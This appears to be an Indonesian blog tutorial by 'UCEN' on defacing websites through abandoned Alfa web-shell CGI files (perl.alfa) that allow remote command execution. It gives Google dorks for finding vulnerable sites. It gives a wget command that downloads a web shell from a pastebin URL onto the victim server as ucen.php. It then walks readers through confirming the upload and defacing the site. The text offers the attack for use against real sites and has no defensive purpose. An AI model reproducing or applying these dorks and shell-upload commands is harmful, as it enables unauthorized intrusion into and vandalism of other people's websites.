Hy semua, balik lagi dengan UCEN jadi disini gw akan ngasih tutorial cara deface Poc dengan metode RCE perl.alfa.

Jadi ini tuh bekasan upload Shell Alfa yang hilang jadi kita bisa remote nya dengan tools perl Alfa RCE.

Oke langsung lanjut ke tutorial nya

Bahan-bahan yang harus kamu siapkan

• Dork?

inurl://ALFA_DATA/alfacgiapi/
intext://perl.alfa
index of /alfacgiapi/per.alfa
Index of /ALFA_DATA/alfacgiapi/perl.alfa

( Racik dork nya atau kalian bisa kembangin sendiri )

• Tools ( Perl Alfa Rce )
• Command upload Shell
wget https://pastebin.com/raw/KY1Pg3mM -O ucen.php

Pertama kalian dorking dulu webnya dengan dork diatas atau dork racikan kalian sendiri.

Ketika sudah Nemu webnya kalian klik per.alfa

Kalo blank berarti webnya vuln Alfa perl 

Selanjutnya kali masuk ke tools nya
Exploits.my.id, dan salin URL tadi
contoh:
http://site.com/ALFA_DATA/alfacgiapi/perl.alfa
Kemudian cek dengan command ls -la

Kemudian masukkan command upload shellnya
wget https://pastebin.com/raw/KY1Pg3mM -O ucen.php

                    Lalu klik " Gaskan "
Jika tools nya kayak gini? Berarti Shell kalian telah terUpload ke web tersebut.
Kalo kalian ingin ngecek Shell nya ke upload atau enggak kali bisa masukkan command
ls
Dan akan terlihat Shell kita telah terUpload.

Boom, terUpload kalian tinggal deface deh
Akses?
http://site.com/ALFA_DATA/alfacgiapi/shellmu.php
Mungkin segitu aja tutor dari gwehh,
Kalo ada gak paham boleh tanya di kolom komentar

See u next time.